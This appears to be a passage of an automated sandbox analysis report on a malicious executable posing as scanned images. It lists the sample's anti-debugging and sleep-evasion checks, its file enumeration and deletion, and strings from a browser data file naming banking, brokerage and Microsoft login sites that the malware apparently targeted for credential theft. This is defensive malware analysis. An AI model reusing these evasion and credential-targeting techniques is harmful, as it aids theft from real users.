            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | API coverage: 4.8 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
            Source: C:\Windows\SysWOW64\schtasks.exe | API coverage: 2.3 %
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 2148 | Thread sleep count: 3013 > 30
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 2148 | Thread sleep time: -6026000s >= -30000s
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 2148 | Thread sleep count: 6959 > 30
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 2148 | Thread sleep time: -13918000s >= -30000s
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe TID: 2624 | Thread sleep time: -65000s >= -30000s
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe TID: 2624 | Thread sleep time: -52500s >= -30000s
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe TID: 2624 | Thread sleep time: -36000s >= -30000s
            Source: C:\Windows\SysWOW64\schtasks.exe | Last function: Thread delayed (2 occurrences)
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A84696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00A84696
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A8C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00A8C9C7
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A8C93C FindFirstFileW,FindClose, 0_2_00A8C93C
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A8F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00A8F200
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A8F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00A8F35D
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A8F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00A8F65E
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A83A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00A83A2B
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A83D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00A83D4E
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A8BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00A8BF27
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 9_2_026CBAB0 FindFirstFileW,FindNextFileW,FindClose, 9_2_026CBAB0
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A24AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00A24AFE
            Source: j0941BH0.9.dr | Binary or memory string: dev.azure.comVMware20,11696497155j
            Source: j0941BH0.9.dr | Binary or memory string: global block list test formVMware20,11696497155
            Source: j0941BH0.9.dr | Binary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: j0941BH0.9.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: j0941BH0.9.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: XraVxjqYYo.exe, 0000000A.00000002.3808040065.0000000001219000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
            Source: j0941BH0.9.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: j0941BH0.9.dr | Binary or memory string: tasks.office.comVMware20,11696497155o
            Source: j0941BH0.9.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: j0941BH0.9.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: firefox.exe, 0000000C.00000002.1915319420.0000023723C0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: j0941BH0.9.dr | Binary or memory string: bankofamerica.comVMware20,11696497155x
            Source: j0941BH0.9.dr | Binary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: j0941BH0.9.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: j0941BH0.9.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: j0941BH0.9.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: j0941BH0.9.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: j0941BH0.9.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: j0941BH0.9.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: j0941BH0.9.dr | Binary or memory string: interactivebrokers.comVMware20,11696497155
            Source: schtasks.exe, 00000009.00000002.3801096520.00000000028E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=4et
            Source: j0941BH0.9.dr | Binary or memory string: AMC password management pageVMware20,11696497155
            Source: j0941BH0.9.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: j0941BH0.9.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: j0941BH0.9.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: j0941BH0.9.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: j0941BH0.9.dr | Binary or memory string: discord.comVMware20,11696497155f
            Source: j0941BH0.9.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: j0941BH0.9.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: j0941BH0.9.dr | Binary or memory string: outlook.office365.comVMware20,11696497155t
            Source: j0941BH0.9.dr | Binary or memory string: outlook.office.comVMware20,11696497155s
            Source: j0941BH0.9.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: j0941BH0.9.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: j0941BH0.9.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\schtasks.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D7096E rdtsc 2_2_02D7096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02137783 LdrLoadDll, 2_2_02137783
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A941FD BlockInput, 0_2_00A941FD
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A23B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00A23B4C
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A55CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00A55CCC
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_00A9C304 LoadLibraryA,GetProcAddress, 0_2_00A9C304
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_016934F0 mov eax, dword ptr fs:[00000030h] 0_2_016934F0
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_01693490 mov eax, dword ptr fs:[00000030h] 0_2_01693490
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | Code function: 0_2_01691E70 mov eax, dword ptr fs:[00000030h] 0_2_01691E70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02D3A2C3 (5 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D402E1 mov eax, dword ptr fs:[00000030h] 2_2_02D402E1 (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E062D6 mov eax, dword ptr fs:[00000030h] 2_2_02E062D6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D6E284 mov eax, dword ptr fs:[00000030h] 2_2_02D6E284 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB0283 mov eax, dword ptr fs:[00000030h] 2_2_02DB0283 (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D402A0 mov eax, dword ptr fs:[00000030h] 2_2_02D402A0 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02DC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DC62A0 mov ecx, dword ptr fs:[00000030h] 2_2_02DC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02DC62A0 (4 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D2A250 mov eax, dword ptr fs:[00000030h] 2_2_02D2A250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D36259 mov eax, dword ptr fs:[00000030h] 2_2_02D36259
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DEA250 mov eax, dword ptr fs:[00000030h] 2_2_02DEA250 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB8243 mov eax, dword ptr fs:[00000030h] 2_2_02DB8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB8243 mov ecx, dword ptr fs:[00000030h] 2_2_02DB8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DE0274 mov eax, dword ptr fs:[00000030h] 2_2_02DE0274 (12 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D34260 mov eax, dword ptr fs:[00000030h] 2_2_02D34260 (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D2826B mov eax, dword ptr fs:[00000030h] 2_2_02D2826B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E0625D mov eax, dword ptr fs:[00000030h] 2_2_02E0625D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D2823B mov eax, dword ptr fs:[00000030h] 2_2_02D2823B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DDE3DB mov eax, dword ptr fs:[00000030h] 2_2_02DDE3DB (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DDE3DB mov ecx, dword ptr fs:[00000030h] 2_2_02DDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DDE3DB mov eax, dword ptr fs:[00000030h] 2_2_02DDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DD43D4 mov eax, dword ptr fs:[00000030h] 2_2_02DD43D4 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DEC3CD mov eax, dword ptr fs:[00000030h] 2_2_02DEC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02D3A3C0 (6 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D383C0 mov eax, dword ptr fs:[00000030h] 2_2_02D383C0 (4 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB63C0 mov eax, dword ptr fs:[00000030h] 2_2_02DB63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_02D4E3F0 (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D663FF mov eax, dword ptr fs:[00000030h] 2_2_02D663FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D403E9 mov eax, dword ptr fs:[00000030h] 2_2_02D403E9 (8 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D28397 mov eax, dword ptr fs:[00000030h] 2_2_02D28397 (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D2E388 mov eax, dword ptr fs:[00000030h] 2_2_02D2E388 (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D5438F mov eax, dword ptr fs:[00000030h] 2_2_02D5438F (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB035C mov eax, dword ptr fs:[00000030h] 2_2_02DB035C (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB035C mov ecx, dword ptr fs:[00000030h] 2_2_02DB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB035C mov eax, dword ptr fs:[00000030h] 2_2_02DB035C (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DFA352 mov eax, dword ptr fs:[00000030h] 2_2_02DFA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DD8350 mov ecx, dword ptr fs:[00000030h] 2_2_02DD8350
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h] 2_2_02DB2349 (15 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DD437C mov eax, dword ptr fs:[00000030h] 2_2_02DD437C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E0634F mov eax, dword ptr fs:[00000030h] 2_2_02E0634F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D2C310 mov ecx, dword ptr fs:[00000030h] 2_2_02D2C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E08324 mov eax, dword ptr fs:[00000030h] 2_2_02E08324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E08324 mov ecx, dword ptr fs:[00000030h] 2_2_02E08324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E08324 mov eax, dword ptr fs:[00000030h] 2_2_02E08324 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D50310 mov ecx, dword ptr fs:[00000030h] 2_2_02D50310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D6A30B mov eax, dword ptr fs:[00000030h] 2_2_02D6A30B (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB20DE mov eax, dword ptr fs:[00000030h] 2_2_02DB20DE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D2C0F0 mov eax, dword ptr fs:[00000030h] 2_2_02D2C0F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D720F0 mov ecx, dword ptr fs:[00000030h] 2_2_02D720F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D2A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_02D2A0E3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D380E9 mov eax, dword ptr fs:[00000030h] 2_2_02D380E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB60E0 mov eax, dword ptr fs:[00000030h] 2_2_02DB60E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D3208A mov eax, dword ptr fs:[00000030h] 2_2_02D3208A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DF60B8 mov eax, dword ptr fs:[00000030h] 2_2_02DF60B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DF60B8 mov ecx, dword ptr fs:[00000030h] 2_2_02DF60B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D280A0 mov eax, dword ptr fs:[00000030h] 2_2_02D280A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DC80A8 mov eax, dword ptr fs:[00000030h] 2_2_02DC80A8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D32050 mov eax, dword ptr fs:[00000030h] 2_2_02D32050
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB6050 mov eax, dword ptr fs:[00000030h] 2_2_02DB6050
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D5C073 mov eax, dword ptr fs:[00000030h] 2_2_02D5C073
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D4E016 mov eax, dword ptr fs:[00000030h] 2_2_02D4E016 (4 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB4000 mov ecx, dword ptr fs:[00000030h] 2_2_02DB4000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DD2000 mov eax, dword ptr fs:[00000030h] 2_2_02DD2000 (8 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DC6030 mov eax, dword ptr fs:[00000030h] 2_2_02DC6030
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D2A020 mov eax, dword ptr fs:[00000030h] 2_2_02D2A020
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D2C020 mov eax, dword ptr fs:[00000030h] 2_2_02D2C020
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E061E5 mov eax, dword ptr fs:[00000030h] 2_2_02E061E5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_02DAE1D0 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DAE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_02DAE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_02DAE1D0 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DF61C3 mov eax, dword ptr fs:[00000030h] 2_2_02DF61C3 (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D601F8 mov eax, dword ptr fs:[00000030h] 2_2_02D601F8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DB019F mov eax, dword ptr fs:[00000030h] 2_2_02DB019F (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB019F mov eax, dword ptr fs:[00000030h]2_2_02DB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB019F mov eax, dword ptr fs:[00000030h]2_2_02DB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2A197 mov eax, dword ptr fs:[00000030h]2_2_02D2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2A197 mov eax, dword ptr fs:[00000030h]2_2_02D2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2A197 mov eax, dword ptr fs:[00000030h]2_2_02D2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D70185 mov eax, dword ptr fs:[00000030h]2_2_02D70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEC188 mov eax, dword ptr fs:[00000030h]2_2_02DEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEC188 mov eax, dword ptr fs:[00000030h]2_2_02DEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD4180 mov eax, dword ptr fs:[00000030h]2_2_02DD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD4180 mov eax, dword ptr fs:[00000030h]2_2_02DD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2C156 mov eax, dword ptr fs:[00000030h]2_2_02D2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC8158 mov eax, dword ptr fs:[00000030h]2_2_02DC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04164 mov eax, dword ptr fs:[00000030h]2_2_02E04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04164 mov eax, dword ptr fs:[00000030h]2_2_02E04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36154 mov eax, dword ptr fs:[00000030h]2_2_02D36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36154 mov eax, dword ptr fs:[00000030h]2_2_02D36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC4144 mov eax, dword ptr fs:[00000030h]2_2_02DC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC4144 mov eax, dword ptr fs:[00000030h]2_2_02DC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC4144 mov ecx, dword ptr fs:[00000030h]2_2_02DC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC4144 mov eax, dword ptr fs:[00000030h]2_2_02DC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC4144 mov eax, dword ptr fs:[00000030h]2_2_02DC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDA118 mov ecx, dword ptr fs:[00000030h]2_2_02DDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDA118 mov eax, dword ptr fs:[00000030h]2_2_02DDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDA118 mov eax, dword ptr fs:[00000030h]2_2_02DDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDA118 mov eax, dword ptr fs:[00000030h]2_2_02DDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF0115 mov eax, dword ptr fs:[00000030h]2_2_02DF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov ecx, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov ecx, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov ecx, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov ecx, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D60124 mov eax, dword ptr fs:[00000030h]2_2_02D60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_02D6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A6C7 mov eax, dword ptr fs:[00000030h]2_2_02D6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02DAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02DAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02DAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02DAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB06F1 mov eax, dword ptr fs:[00000030h]2_2_02DB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB06F1 mov eax, dword ptr fs:[00000030h]2_2_02DB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D34690 mov eax, dword ptr fs:[00000030h]2_2_02D34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D34690 mov eax, dword ptr fs:[00000030h]2_2_02D34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D666B0 mov eax, dword ptr fs:[00000030h]2_2_02D666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C6A6 mov eax, dword ptr fs:[00000030h]2_2_02D6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4C640 mov eax, dword ptr fs:[00000030h]2_2_02D4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D62674 mov eax, dword ptr fs:[00000030h]2_2_02D62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF866E mov eax, dword ptr fs:[00000030h]2_2_02DF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF866E mov eax, dword ptr fs:[00000030h]2_2_02DF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A660 mov eax, dword ptr fs:[00000030h]2_2_02D6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A660 mov eax, dword ptr fs:[00000030h]2_2_02D6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72619 mov eax, dword ptr fs:[00000030h]2_2_02D72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE609 mov eax, dword ptr fs:[00000030h]2_2_02DAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
